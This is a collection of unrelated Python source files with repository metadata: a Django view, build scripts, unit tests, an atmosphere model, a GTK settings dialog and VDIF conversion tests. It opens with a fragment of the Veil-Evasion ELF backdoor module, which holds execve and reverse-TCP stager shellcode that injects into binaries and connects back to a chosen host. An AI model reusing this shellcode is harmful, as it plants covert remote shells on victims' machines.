"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
Modified metasploit linux/x64/shell/reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
For user with position independent shellcode from the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
|
codercold/Veil-Evasion
|
tools/backdoor/intel/LinuxIntelELF32.py
|
Python
|
gpl-3.0
| 5,166
|
from django.http import HttpResponse
from django.core.cache import cache
from EventSubscriptions.models import EventWithSubscriptions
import requests
'''
This view provides the final result requested from the exercise. It first looks for it in the cache; if the result is
not there, it calls the class "EventWithSubscriptions" in order to perform the query. If the response is successful,
is being stored inside the cache. Cache timeout is 4.2 minutes (252 seconds).
'''
def event_subscriptions(req):
if req.method == 'GET': # we process GET requests only
if req.path.split('/')[2] == '': # it is mandatory to insert characters for the event_id
return HttpResponse("The path must be: \"/events-with-subscriptions/EVENT_ID\"")
event_id = req.path.split('/')[2]
key = 'event-with-subscriptions'
timeout = 252 # cache timeout (4.2 minutes)
result = cache.get(key) # trying to get the result from the cache, otherwise => query to the website
if result is None:
obj = EventWithSubscriptions(event_id)
result = obj.perform_and_combine_responses()
# if the method gives us a response code or an Exception, we do not store the result in the cache
if type(result) is int:
return HttpResponse("Server returned with the following error code: " + str(result) +
" . Please, try again later.")
if type(result) is requests.Timeout:
return HttpResponse("Connection timeout! Please, try again later")
if type(result) is requests.RequestException:
return HttpResponse("Problems with the network/server, please try again later.")
cache.set(key, result, timeout) # if the response is successful, setting the result in cache
return HttpResponse(result, content_type='application/json')
else:
return HttpResponse("Unrecognized method")
|
luispdm/Calendar42Proxy
|
EventSubscriptions/views.py
|
Python
|
gpl-3.0
| 1,983
|
# #############################################################################
# AUTHOR BLOCK:
# #############################################################################
#
# RIB Mosaic RenderMan(R) IDE, see <http://sourceforge.net/projects/ribmosaic>
# by Eric Nathen Back aka WHiTeRaBBiT, 01-24-2010
# This script is protected by the GPL: Gnu Public License
# GPL - http://www.gnu.org/copyleft/gpl.html
#
# #############################################################################
# GPL LICENSE BLOCK:
# #############################################################################
#
# Script Copyright (C) Eric Nathen Back
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# #############################################################################
# COPYRIGHT BLOCK:
# #############################################################################
#
# The RenderMan(R) Interface Procedures and Protocol are:
# Copyright 1988, 1989, 2000, 2005 Pixar
# All Rights Reserved
# RenderMan(R) is a registered trademark of Pixar
#
# #############################################################################
# COMMENT BLOCK:
# #############################################################################
#
# !/usr/bin/env python
# Builds ribify C module using the rm_ribify.py PYthon script with Cython.
#
# This script is PEP 8 compliant
#
# Search TODO for incomplete code
# Search FIXME for improper code
# Search XXX for broken code
#
# #############################################################################
# END BLOCKS
# #############################################################################
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(name="ribify", version="0.0",
ext_modules = [Extension("ribify", ["rm_ribify.py"])])
|
gabyx/RIBMosaic
|
render_ribmosaic/setup.py
|
Python
|
gpl-3.0
| 2,423
|
# coding=utf-8
"""
InaSAFE Disaster risk assessment tool developed by AusAid and World Bank
- **Impact function Test Cases.**
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'akbargumbira@gmail.com'
__date__ = '11/12/2015'
__copyright__ = ('Copyright 2012, Australia Indonesia Facility for '
'Disaster Reduction')
import unittest
from safe.impact_functions.impact_function_manager import ImpactFunctionManager
from safe.impact_functions.volcanic.volcano_point_building.impact_function \
import VolcanoPointBuildingFunction
from safe.test.utilities import test_data_path, get_qgis_app
from safe.storage.core import read_layer
from safe.storage.safe_layer import SafeLayer
QGIS_APP, CANVAS, IFACE, PARENT = get_qgis_app()
class TestVolcanoPointBuildingFunction(unittest.TestCase):
"""Test for Volcano Point on Building Impact Function."""
def setUp(self):
registry = ImpactFunctionManager().registry
registry.clear()
registry.register(VolcanoPointBuildingFunction)
def test_run(self):
"""TestVolcanoPointBuildingFunction: Test running the IF."""
volcano_path = test_data_path('hazard', 'volcano_point.shp')
building_path = test_data_path('exposure', 'buildings.shp')
hazard_layer = read_layer(volcano_path)
exposure_layer = read_layer(building_path)
impact_function = VolcanoPointBuildingFunction.instance()
impact_function.hazard = SafeLayer(hazard_layer)
impact_function.exposure = SafeLayer(exposure_layer)
impact_function.run()
impact_layer = impact_function.impact
# Check the question
expected_question = (
'In the event of volcano point how many buildings might be '
'affected')
message = 'The question should be %s, but it returns %s' % (
expected_question, impact_function.question)
self.assertEqual(expected_question, impact_function.question, message)
# The buildings should all be categorised into 3000 zone
zone_sum = sum(impact_layer.get_data(
attribute=impact_function.target_field))
expected_sum = 3 * 181
message = 'Expecting %s, but it returns %s' % (expected_sum, zone_sum)
self.assertEqual(zone_sum, expected_sum, message)
def test_filter(self):
"""TestVolcanoPointBuildingFunction: Test filtering IF"""
hazard_keywords = {
'volcano_name_field': 'NAME',
'hazard_category': 'multiple_event',
'keyword_version': 3.2,
'title': 'Volcano Point',
'hazard': 'volcano',
'source': 'smithsonian',
'layer_geometry': 'point',
'layer_purpose': 'hazard',
'layer_mode': 'classified',
}
exposure_keywords = {
'license': 'Open Data Commons Open Database License (ODbL)',
'keyword_version': 3.2,
'structure_class_field': 'TYPE',
'title': 'Buildings',
'layer_geometry': 'polygon',
'source': 'OpenStreetMap - www.openstreetmap.org',
'date': '26-03-2015 14:03',
'layer_purpose': 'exposure',
'layer_mode': 'classified',
'exposure': 'structure'}
impact_functions = ImpactFunctionManager().filter_by_keywords(
hazard_keywords, exposure_keywords)
message = 'There should be 1 impact function, but there are: %s' % \
len(impact_functions)
self.assertEqual(1, len(impact_functions), message)
retrieved_if = impact_functions[0].metadata().as_dict()['id']
expected = ImpactFunctionManager().get_function_id(
VolcanoPointBuildingFunction)
message = 'Expecting %s, but getting %s instead' % (
expected, retrieved_if)
self.assertEqual(expected, retrieved_if, message)
|
dynaryu/inasafe
|
safe/impact_functions/volcanic/volcano_point_building/test/test_volcano_point_building.py
|
Python
|
gpl-3.0
| 4,136
|
# Copyright 2009 Noam Yorav-Raphael
#
# This file is part of DreamPie.
#
# DreamPie is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DreamPie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DreamPie. If not, see <http://www.gnu.org/licenses/>.
# This file is a script (not a module) run by the DreamPie GUI.
# It expects one argument: the port to connect to.
# It creates a package called dreampielib from subp-py2.zip or subp-py3.zip
# (which are expected to be in the directory of __file__),
# and runs dreampielib.subprocess.main(port).
import sys
from os.path import abspath, join, dirname
def main():
port = int(sys.argv[1])
py_ver = sys.version_info[0]
lib_name = abspath(join(dirname(__file__), 'subp-py%d' % py_ver))
sys.path.insert(0, lib_name)
from dreampielib.subprocess import main as subprocess_main
del sys.path[0]
if sys.version_info[:2] == (3, 0):
sys.stderr.write("Warning: DreamPie doesn't support Python 3.0. \n"
"Please upgrade to Python 3.1.\n")
subprocess_main(port)
if __name__ == '__main__':
main()
|
noamraph/dreampie
|
dreampielib/data/subp_main.py
|
Python
|
gpl-3.0
| 1,566
|
import csv
from dateutil.parser import parse
from adoptarbol.tree.models import Tree
def load(filename):
with open(filename, encoding='utf-8') as f:
reader = csv.reader(f)
header = next(reader)
def pos_for(field):
return header.index(field)
def float_or_none(string):
try:
return(float(string))
except ValueError:
return None
for row in reader:
# codigo = str(row[pos_for('codigo')]),
print('Procesando ', row)
tree = {'code': row[pos_for('codigo')],
'common_name': row[pos_for('especie')],
'scientific_name': row[pos_for('cientifico')],
'family': row[pos_for('familia')],
'coord_utm_e': float_or_none(row[pos_for('utm_x')].replace(',', '.')),
'coord_utm_n': float_or_none(row[pos_for('utm_y')].replace(',', '.')),
'coord_utm_zone_letter': row[pos_for('utm_zone')],
'coord_utm_zone_n': row[pos_for('utm_south')],
'coord_lat': float_or_none(row[pos_for('lat')].replace(',', '.')),
'coord_lon': float_or_none(row[pos_for('long')].replace(',', '.')),
'photo': row[pos_for('fotos')],
'diameter': row[pos_for('dia')],
'height': row[pos_for('alt')],
'circ': row[pos_for('circ')],
'base_area': float_or_none(row[pos_for('areabasal')].replace(',', '.')),
'size_class': row[pos_for('clasetamano')],
'quality': float_or_none(row[pos_for('calidad')].replace(',', '.')),
'relevance': row[pos_for('relevancia')],
'notes': row[pos_for('notas')],
'phenology': row[pos_for('fenologia')],
'observation': row[pos_for('obs')],
'surveyed_on': parse(row[pos_for('fechahora')]),
}
t = Tree(**tree)
t.save()
"""
if __name__ == '__main__':
app = create_app(CONFIG)
manager = Manager(app)
with app.app_context():
load()
"""
|
icarito/arbio-azucar-adoptarbol
|
loader.py
|
Python
|
gpl-3.0
| 2,243
|
# -*- coding: utf-8 -*-
"""
* Partial implementation of standard atmospheric model as described in
* GOST 4401-81 useful for processing of data from meteorological balloon
* sensors.
*
* Supported modelling of temperature and pressure over the altitude span from
* 0 up to 51km.
*
* algorithm by Oleg Kochetov <ok@noiselab.ru>
"""
from math import log10
class GOST4401(object):
G = 9.80665
R = 287.05287
E = 6356766
MIN_PRESSURE = 6.69384
MAX_PRESSURE = 101325.00
MIN_GP_ALT = 0.00
MAX_GP_ALT = 51000.00
# Lookup table with averaged empirical parameters for
# lower layers of atmosphere in accordance with ГОСТ 4401-81
LUT_RECORDS = 6
tab = {
'altitude' : 0, # Geopotentional altitude
'temperature' : 1, # degrees K
'temp gradient' : 2, # degrees K per meter
'pressure' : 3, # pascals
}
ag_table = [
[0, 288.15, -0.0065, 101325.00],
[11000, 216.65, 0.0, 22632.04],
[20000, 216.65, 0.0010, 5474.87],
[32000, 228.65, 0.0028, 868.0146],
[47000, 270.65, 0.0, 110.9056],
[51000, 270.65, -0.0028, 6.69384]
]
@staticmethod
def geopotential_to_geometric(self, altitude):
return altitude * self.E / (self.E - altitude)
@staticmethod
def geometric_to_geopotential(self, altitude):
return altitude * self.E / (self.E + altitude)
def get_altitude(self, pressure):
"""
Returns geometric altitude value for the given pressure.
:param pressure: float pressure - pressure in pascals
:return: float geometric altitude in meters
"""
# Pressure in Pascals
if (pressure <= self.MIN_PRESSURE) or (pressure > self.MAX_PRESSURE):
return None
for idx in range(0, self.LUT_RECORDS - 1):
if ((pressure <= self.ag_table[idx][self.tab['pressure']]) and
(pressure > self.ag_table[idx + 1][self.tab['pressure']])):
break
Ps = float(self.ag_table[idx][self.tab['pressure']])
Bm = float(self.ag_table[idx][self.tab['temp gradient']])
Tm = float(self.ag_table[idx][self.tab['temperature']])
Hb = float(self.ag_table[idx][self.tab['altitude']])
if Bm != 0:
geopot_H = ((Tm * pow(Ps / pressure, Bm * self.R / self.G) - Tm) / Bm)
else:
geopot_H = log10(Ps / pressure) * (self.R * Tm) / self.G * 0.434292
return self.geopotential_to_geometric(self, Hb + geopot_H)
def get_pressure(self, altitude):
"""
Returns pressure in pascals for the given geometric altitude
:param altitude: float altitude - geometric altitude in meters
:return: float - pressure in pascals
"""
geopot_H = self.geometric_to_geopotential(self, altitude)
if (geopot_H < self.MIN_GP_ALT) or (geopot_H >= self.MAX_GP_ALT):
return None
for idx in range(0, self.LUT_RECORDS - 1):
if ((geopot_H >= self.ag_table[idx][self.tab['altitude']]) and
(geopot_H < self.ag_table[idx + 1][self.tab['altitude']])):
break
Ps = float(self.ag_table[idx][self.tab['pressure']])
Bm = float(self.ag_table[idx][self.tab['temp gradient']])
Tm = float(self.ag_table[idx][self.tab['temperature']])
Hb = float(self.ag_table[idx][self.tab['altitude']])
if Bm != 0:
lP = log10(Ps) - (self.G / (Bm * self.R)) * log10((Tm + Bm * (geopot_H - Hb)) / Tm)
else:
lP = log10(Ps) - 0.434294 * (self.G * (geopot_H - Hb)) / (self.R * Tm)
return pow(10, lP)
def get_temperature(self, altitude):
"""
Returns temperature value in K for the given geometric altitude.
:param altitude: float altitude - geometric altitude in meters
:return: float - temperature in degrees K
"""
geopot_H = self.geometric_to_geopotential(self, altitude)
if (geopot_H < self.MIN_GP_ALT) or (geopot_H >= self.MAX_GP_ALT):
return None
for idx in range(0, self.LUT_RECORDS - 1):
if ((geopot_H >= self.ag_table[idx][self.tab['altitude']]) and
(geopot_H < self.ag_table[idx + 1][self.tab['altitude']])):
break
Bm = float(self.ag_table[idx][self.tab['temp gradient']])
Tm = float(self.ag_table[idx][self.tab['temperature']])
Hb = float(self.ag_table[idx][self.tab['altitude']])
temp = Tm
if Bm != 0:
temp += Bm * (geopot_H - Hb)
return temp
|
Shatki/PyIMU
|
gost4401_81.py
|
Python
|
gpl-3.0
| 4,655
|
#!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde <cedric.bellegarde@adishatz.org>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk, GLib, Gio, Pango
try:
from gi.repository import Secret
except:
Secret = None
from gettext import gettext as _
from _thread import start_new_thread
from lollypop.define import Lp, Type, SecretSchema, SecretAttributes
from lollypop.utils import use_csd
# Lollypop settings
class Settings(Gio.Settings):
"""
Init settings
"""
def __init__(self):
Gio.Settings.__init__(self)
"""
Return a new Settings object
"""
def new():
settings = Gio.Settings.new('org.gnome.Lollypop')
settings.__class__ = Settings
return settings
"""
Return music paths
@return [str]
"""
def get_music_paths(self):
paths = self.get_value('music-path')
if not paths:
if GLib.get_user_special_dir(GLib.UserDirectory.DIRECTORY_MUSIC):
paths = [GLib.get_user_special_dir(
GLib.UserDirectory.DIRECTORY_MUSIC)]
else:
print("You need to add a music path"
" to org.gnome.Lollypop in dconf")
return paths
# Dialog showing lollypop options
class SettingsDialog:
def __init__(self):
self._choosers = []
builder = Gtk.Builder()
builder.add_from_resource('/org/gnome/Lollypop/SettingsDialog.ui')
self._settings_dialog = builder.get_object('settings_dialog')
self._settings_dialog.set_transient_for(Lp.window)
if use_csd():
self._settings_dialog.set_titlebar(
builder.get_object('header_bar'))
switch_scan = builder.get_object('switch_scan')
switch_scan.set_state(Lp.settings.get_value('auto-update'))
switch_view = builder.get_object('switch_dark')
switch_view.set_state(Lp.settings.get_value('dark-ui'))
switch_background = builder.get_object('switch_background')
switch_background.set_state(Lp.settings.get_value('background-mode'))
switch_state = builder.get_object('switch_state')
switch_state.set_state(Lp.settings.get_value('save-state'))
switch_autoplay = builder.get_object('switch_autoplay')
switch_autoplay.set_state(Lp.settings.get_value('auto-play'))
switch_genres = builder.get_object('switch_genres')
switch_genres.set_state(Lp.settings.get_value('show-genres'))
self._settings_dialog.connect('destroy', self._edit_settings_close)
builder.connect_signals(self)
main_chooser_box = builder.get_object('main_chooser_box')
self._chooser_box = builder.get_object('chooser_box')
party_grid = builder.get_object('party_grid')
#
# Music tab
#
dirs = []
for directory in Lp.settings.get_value('music-path'):
dirs.append(directory)
# Main chooser
self._main_chooser = ChooserWidget()
image = Gtk.Image.new_from_icon_name("list-add-symbolic",
Gtk.IconSize.MENU)
self._main_chooser.set_icon(image)
self._main_chooser.set_action(self._add_chooser)
main_chooser_box.pack_start(self._main_chooser, False, True, 0)
if len(dirs) > 0:
path = dirs.pop(0)
else:
path = GLib.get_user_special_dir(
GLib.UserDirectory.DIRECTORY_MUSIC)
self._main_chooser.set_dir(path)
# Others choosers
for directory in dirs:
self._add_chooser(directory)
#
# Party mode tab
#
genres = Lp.genres.get()
genres.insert(0, (Type.POPULARS, _("Populars")))
genres.insert(1, (Type.RECENTS, _("Recents")))
ids = Lp.player.get_party_ids()
i = 0
x = 0
for genre_id, genre in genres:
label = Gtk.Label()
label.set_property('margin-start', 10)
label.set_property('halign', Gtk.Align.START)
label.set_property('hexpand', True)
label.set_ellipsize(Pango.EllipsizeMode.END)
label.set_text(genre)
label.show()
switch = Gtk.Switch()
if genre_id in ids:
switch.set_state(True)
switch.connect("state-set", self._party_switch_state, genre_id)
switch.set_property('margin-end', 50)
switch.show()
party_grid.attach(label, x, i, 1, 1)
party_grid.attach(switch, x+1, i, 1, 1)
if x == 0:
x += 2
else:
i += 1
x = 0
#
# Last.fm tab
#
if Lp.lastfm is not None and Secret is not None:
self._test_img = builder.get_object('test_img')
self._login = builder.get_object('login')
self._password = builder.get_object('password')
schema = Secret.Schema.new("org.gnome.Lollypop",
Secret.SchemaFlags.NONE,
SecretSchema)
Secret.password_lookup(schema, SecretAttributes, None,
self._on_password_lookup)
builder.get_object('lastfm_grid').set_sensitive(True)
builder.get_object('lastfm_error').hide()
self._login.set_text(
Lp.settings.get_value('lastfm-login').get_string())
"""
Show dialog
"""
def show(self):
self._settings_dialog.show()
#######################
# PRIVATE #
#######################
"""
Add a new chooser widget
@param directory path as string
"""
def _add_chooser(self, directory=None):
chooser = ChooserWidget()
image = Gtk.Image.new_from_icon_name("list-remove-symbolic",
Gtk.IconSize.MENU)
chooser.set_icon(image)
if directory:
chooser.set_dir(directory)
self._chooser_box.add(chooser)
"""
Update view setting
@param widget as unused, state as widget state
"""
def _update_ui_setting(self, widget, state):
Lp.settings.set_value('dark-ui', GLib.Variant('b', state))
if not Lp.player.is_party():
settings = Gtk.Settings.get_default()
settings.set_property("gtk-application-prefer-dark-theme", state)
Lp.window.update_view()
"""
Update scan setting
@param widget as unused, state as widget state
"""
def _update_scan_setting(self, widget, state):
Lp.settings.set_value('auto-update',
GLib.Variant('b', state))
"""
Update background mode setting
@param widget as unused, state as widget state
"""
def _update_background_setting(self, widget, state):
Lp.settings.set_value('background-mode',
GLib.Variant('b', state))
"""
Update save state setting
@param widget as unused, state as widget state
"""
def _update_state_setting(self, widget, state):
Lp.settings.set_value('save-state',
GLib.Variant('b', state))
"""
Update show genre setting
@param widget as unused, state as widget state
"""
def _update_genres_setting(self, widget, state):
Lp.window.show_genres(state)
Lp.settings.set_value('show-genres',
GLib.Variant('b', state))
"""
Update auto play setting
@param widget as unused, state as widget state
"""
def _update_autoplay_setting(self, widget, state):
Lp.settings.set_value('auto-play',
GLib.Variant('b', state))
"""
Update lastfm settings
@param sync as bool
"""
def _update_lastfm_settings(self, sync=False):
if Lp.lastfm is not None and Secret is not None:
schema = Secret.Schema.new("org.gnome.Lollypop",
Secret.SchemaFlags.NONE,
SecretSchema)
Secret.password_store_sync(schema, SecretAttributes,
Secret.COLLECTION_DEFAULT,
"org.gnome.Lollypop.lastfm.login %s" %
self._login.get_text(),
self._password.get_text(),
None)
Lp.settings.set_value('lastfm-login',
GLib.Variant('s', self._login.get_text()))
if sync:
Lp.lastfm.connect_sync(self._password.get_text())
else:
Lp.lastfm.connect(self._password.get_text())
"""
Close edit party dialog
@param widget as Gtk.Window
"""
def _edit_settings_close(self, widget):
# Music path
paths = []
main_path = self._main_chooser.get_dir()
choosers = self._chooser_box.get_children()
if main_path == GLib.get_user_special_dir(
GLib.UserDirectory.DIRECTORY_MUSIC)\
and not choosers:
paths = []
else:
paths.append(main_path)
for chooser in choosers:
path = chooser.get_dir()
if path is not None and path not in paths:
paths.append(path)
previous = Lp.settings.get_value('music-path')
Lp.settings.set_value('music-path', GLib.Variant('as', paths))
# Last.fm
self._update_lastfm_settings()
self._settings_dialog.hide()
self._settings_dialog.destroy()
if set(previous) != set(paths):
Lp.window.update_db()
"""
Update party ids when use change a switch in dialog
@param widget as unused, state as widget state, genre id as int
"""
def _party_switch_state(self, widget, state, genre_id):
ids = Lp.player.get_party_ids()
if state:
try:
ids.append(genre_id)
except:
pass
else:
try:
ids.remove(genre_id)
except:
pass
Lp.settings.set_value('party-ids', GLib.Variant('ai', ids))
"""
Test lastfm connection
@param button as Gtk.Button
"""
def _on_test_btn_clicked(self, button):
self._update_lastfm_settings(True)
if not Gio.NetworkMonitor.get_default().get_network_available():
self._test_img.set_from_icon_name('computer-fail-symbolic',
Gtk.IconSize.MENU)
return
start_new_thread(self._test_lastfm_connection, ())
"""
Test lastfm connection
@thread safe
"""
def _test_lastfm_connection(self):
try:
u = Lp.lastfm.get_authenticated_user()
u.get_id()
GLib.idle_add(self._test_img.set_from_icon_name,
'object-select-symbolic',
Gtk.IconSize.MENU)
except:
GLib.idle_add(self._test_img.set_from_icon_name,
'computer-fail-symbolic',
Gtk.IconSize.MENU)
"""
Set password entry
@param source as GObject.Object
@param result Gio.AsyncResult
"""
def _on_password_lookup(self, source, result):
password = None
if result is not None:
password = Secret.password_lookup_finish(result)
if password is not None:
self._password.set_text(password)
# Widget used to let user select a collection folder
class ChooserWidget(Gtk.Grid):
def __init__(self):
Gtk.Grid.__init__(self)
self._action = None
self.set_property("orientation", Gtk.Orientation.HORIZONTAL)
self.set_property("halign", Gtk.Align.CENTER)
self._chooser_btn = Gtk.FileChooserButton()
self._chooser_btn.set_action(Gtk.FileChooserAction.SELECT_FOLDER)
self._chooser_btn.set_property("margin", 5)
self._chooser_btn.show()
self.add(self._chooser_btn)
self._action_btn = Gtk.Button()
self._action_btn.set_property("margin", 5)
self._action_btn.show()
self.add(self._action_btn)
self._action_btn.connect("clicked", self._do_action)
self.show()
"""
Set current selected path for chooser
@param directory path as string
"""
def set_dir(self, path):
if path:
self._chooser_btn.set_uri("file://"+path)
"""
Set image for action button
@param Gtk.Image
"""
def set_icon(self, image):
self._action_btn.set_image(image)
"""
Set action callback for button clicked signal
@param func
"""
def set_action(self, action):
self._action = action
"""
Return select directory path
@return path as string
"""
def get_dir(self):
path = None
uri = self._chooser_btn.get_uri()
if uri is not None:
path = GLib.uri_unescape_string(uri, None)
if path is not None:
return path[7:]
else:
return None
#######################
# PRIVATE #
#######################
"""
If action defined, execute, else, remove widget
"""
def _do_action(self, widget):
if self._action:
self._action()
else:
self.destroy()
|
yoseforb/lollypop
|
src/settings.py
|
Python
|
gpl-3.0
| 14,299
|
import urllib2
url = "http://ifolderlinks.ru/404"
req = urllib2.Request(url)
#try:
response = urllib2.urlopen(req,timeout=3)
#except urllib2.HTTPError as e:
# print 'The server couldn\'t fulfill the request.'
# print 'Error code: ', e.code
print response.info()
#print response.read()
|
emmdim/guifiAnalyzer
|
traffic/tests/testUrl.py
|
Python
|
gpl-3.0
| 295
|
#!/usr/bin/python3
import gui
gui.main()
|
Koala-Kaolin/pyweb
|
src/__main__.py
|
Python
|
gpl-3.0
| 42
|
# Licensed under the GPLv3 - see LICENSE
import pytest
import numpy as np
import astropy.units as u
from astropy.time import Time
from .. import vdif
from .. import mark4
from .. import mark5b
from .. import dada
from ..base.encoding import EIGHT_BIT_1_SIGMA
from ..data import (SAMPLE_MARK4 as SAMPLE_M4, SAMPLE_MARK5B as SAMPLE_M5B,
SAMPLE_VDIF, SAMPLE_MWA_VDIF as SAMPLE_MWA, SAMPLE_DADA,
SAMPLE_BPS1_VDIF)
class TestVDIFMark5B:
"""Simplest conversion: VDIF frame containing Mark5B data (EDV 0xab)."""
def test_header(self):
"""Check Mark 5B header information can be stored in a VDIF header."""
with open(SAMPLE_M5B, 'rb') as fh:
# Start time kiloday is needed for Mark 5B to calculate time.
m5h1 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# For the payload, pass in how data is encoded.
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# A not-at-the-start header for checking times.
m5h2 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# Create VDIF headers based on both the Mark 5B header and payload.
header1 = vdif.VDIFHeader.from_mark5b_header(
m5h1, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
header2 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
for i, (m5h, header) in enumerate(((m5h1, header1), (m5h2, header2))):
assert m5h['frame_nr'] == i
# Check all direct information is set correctly.
assert all(m5h[key] == header[key] for key in m5h.keys())
assert header['mark5b_frame_nr'] == m5h['frame_nr']
assert header.kday == m5h.kday
# As well as the time calculated from the header information.
assert header.time == m5h.time
# Check information on the payload is also correct.
assert header.nchan == 8
assert header.bps == 2
assert not header['complex_data']
assert header.frame_nbytes == 10032
assert header.nbytes == 32
assert header.payload_nbytes == m5h.payload_nbytes
assert (header.samples_per_frame
== 10000 * 8 // m5pl.bps // m5pl.sample_shape.nchan)
# Check that we can handle > 512 Mbps sampling rate.
header3 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps,
sample_rate=64*u.MHz)
assert header3.time == header2.time
assert header3['frame_nr'] == m5h2['frame_nr']
# A copy might remove any `kday` keywords set, but should still work
# (Regression test for #34)
header_copy = header2.copy()
assert header_copy == header2
header_copy.verify()
# But it should not remove `kday` to start with (#35)
assert header_copy.kday == header2.kday
# May as well check that with a corrupt 'bcd_fraction' we can still
# get the right time using the frame number.
header_copy['bcd_fraction'] = 0
# This is common enough that we should not fail verification.
header_copy.verify()
# However, it should also cause just getting the time to fail
# unless we pass in a frame rate.
with pytest.raises(ValueError):
header_copy.time
frame_rate = 32. * u.MHz / header.samples_per_frame
assert abs(header_copy.get_time(frame_rate=frame_rate)
- m5h2.time) < 1.*u.ns
def test_payload(self):
"""Check Mark 5B payloads can used in a Mark5B VDIF payload."""
# Get Mark 5B header, payload, and construct VDIF header, as above.
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
header = vdif.VDIFHeader.from_mark5b_header(
m5h, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
# Create VDIF payload from the Mark 5B encoded payload.
payload = vdif.VDIFPayload(m5pl.words, header)
# Check that the payload (i.e., encoded data) is the same.
assert np.all(payload.words == m5pl.words)
# And check that if we decode the payload, we get the same result.
assert np.all(payload.data == m5pl.data)
# Now construct a VDIF payload from the Mark 5B data, checking that
# the encoding works correctly too.
payload2 = vdif.VDIFPayload.fromdata(m5pl.data, header)
assert np.all(payload2.words == m5pl.words)
assert np.all(payload2.data == m5pl.data)
# Mark 5B data cannot complex. Check that this raises an exception.
header2 = header.copy()
with pytest.raises(ValueError):
header2.complex_data = True
with pytest.raises(ValueError):
header2['complex_data'] = True
with pytest.raises(ValueError):
vdif.VDIFPayload.fromdata(m5pl.data.view(complex), bps=2, edv=0xab)
def test_frame(self):
"""Check a whole Mark 5B frame can be translated to VDIF."""
with mark5b.open(SAMPLE_M5B, 'rb', ref_time=Time(57000, format='mjd'),
nchan=8, bps=2) as fh:
# pick second frame just to be different from header checks above.
fh.seek(10016)
m5f = fh.read_frame()
assert m5f['frame_nr'] == 1
frame = vdif.VDIFFrame.from_mark5b_frame(m5f)
assert frame.nbytes == 10032
assert frame.shape == (5000, 8)
assert np.all(frame.data == m5f.data)
assert frame.time == m5f.time
def test_stream(self):
"""Check we can encode a whole stream."""
class TestVDIF0VDIF1:
"""Conversion between EDV versions."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_MWA, 'rs', sample_rate=1.28*u.MHz) as f0:
h0 = f0.header0
d0 = f0.read(1024)
kwargs = dict(h0)
kwargs['edv'] = 1
fl = str(tmpdir.join('test1.vdif'))
